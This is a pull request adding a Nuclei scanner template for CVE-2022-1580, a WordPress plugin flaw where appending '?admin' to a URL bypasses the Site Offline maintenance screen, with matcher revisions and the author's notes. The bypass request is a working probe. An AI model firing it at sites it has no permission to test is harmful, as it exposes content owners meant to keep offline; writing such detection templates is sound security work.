### PR TITLE
add cve-2022-1580

### DIFF
--- a/http/cves/2022/CVE-2022-1580.yaml
+++ b/http/cves/2022/CVE-2022-1580.yaml
@@ -1,0 +1,52 @@
+id: CVE-2022-1580
+
+info:
+  name: Site Offline WP Plugin < 1.5.3 - Access Bypass
+  author: Kazgangap
+  severity: medium
+  description: |
+    The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1580
+    - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2022-1580
+    cwe-id: CWE-639
+    epss-score: 0.00058
+    epss-percentile: 0.23919
+    cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:*
+  metadata:
+    vendor: freehtmldesigns
+    product: site_offline
+    framework: wordpress
+  tags: wpscan,cve2022,bypass,wordpress,wordpress-plugin
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/site-offline/readme.txt"
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'Site Offline Or Coming Soon Or Maintenance Mode ' #Plugin Check 
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/?admin"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "wp-block"
+          - "author"
+        condition: or
+      - type: status
+        status:
+          - 200

--- a/http/cves/2022/CVE-2022-1580.yaml
+++ b/http/cves/2022/CVE-2022-1580.yaml
@@ -1,15 +1,15 @@
 id: CVE-2022-1580
 
 info:
-  name: Site Offline WP Plugin < 1.5.3 - Access Bypass
+  name: Site Offline WP Plugin < 1.5.3 - Authorization Bypass
   author: Kazgangap
   severity: medium
   description: |
     The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.
   remediation: Fixed in 1.5.3
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-1580
     - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1580
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 4.3
@@ -26,6 +26,7 @@ info:
     framework: wordpress
     publicwww-query: "/wp-content/plugins/site-offline/"
   tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp
+
 flow: http(1) && http(2)
 
 http:
@@ -43,14 +44,9 @@ http:
     path:
       - "{{BaseURL}}/?admin"
 
-    matchers-condition: and
     matchers:
-      - type: word
-        words:
-          - "wp-block"
-          - "author"
+      - type: dsl
+        dsl:
+          - 'contains_all(body, "wp-block", "author")'
+          - 'status_code == 200'
         condition: and
-
-      - type: status
-        status:
-          - 200

--- a/http/cves/2022/CVE-2022-1580.yaml
+++ b/http/cves/2022/CVE-2022-1580.yaml
@@ -6,6 +6,7 @@ info:
   severity: medium
   description: |
     The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.
+  remediation: Fixed in 1.5.3
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2022-1580
     - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/
@@ -15,14 +16,16 @@ info:
     cve-id: CVE-2022-1580
     cwe-id: CWE-639
     epss-score: 0.00058
-    epss-percentile: 0.23919
+    epss-percentile: 0.24444
     cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:*
   metadata:
+    verified: true
+    max-request: 1
     vendor: freehtmldesigns
     product: site_offline
     framework: wordpress
-  tags: wpscan,cve2022,bypass,wordpress,wordpress-plugin
-
+    publicwww-query: "/wp-content/plugins/site-offline/"
+  tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp
 flow: http(1) && http(2)
 
 http:
@@ -46,7 +49,8 @@ http:
         words:
           - "wp-block"
           - "author"
-        condition: or
+        condition: and
+
       - type: status
         status:
           - 200

--- a/http/cves/2022/CVE-2022-1580.yaml
+++ b/http/cves/2022/CVE-2022-1580.yaml
@@ -34,7 +34,7 @@ http:
       - type: word
         internal: true
         words:
-          - 'Site Offline Or Coming Soon Or Maintenance Mode ' #Plugin Check 
+          - 'Site Offline Or Coming Soon Or Maintenance Mode'
 
   - method: GET
     path:


### PR DESCRIPTION
### Template / PR Information

The related vulnerability nullifies the function of the plugin with the ?admin parameter. So I used the words wp-block and author as a matcher, which is on every wordpress site. 

add cve-2022-1580

https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/
https://nvd.nist.gov/vuln/detail/CVE-2022-1580
https://wordpress.org/plugins/site-offline/

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)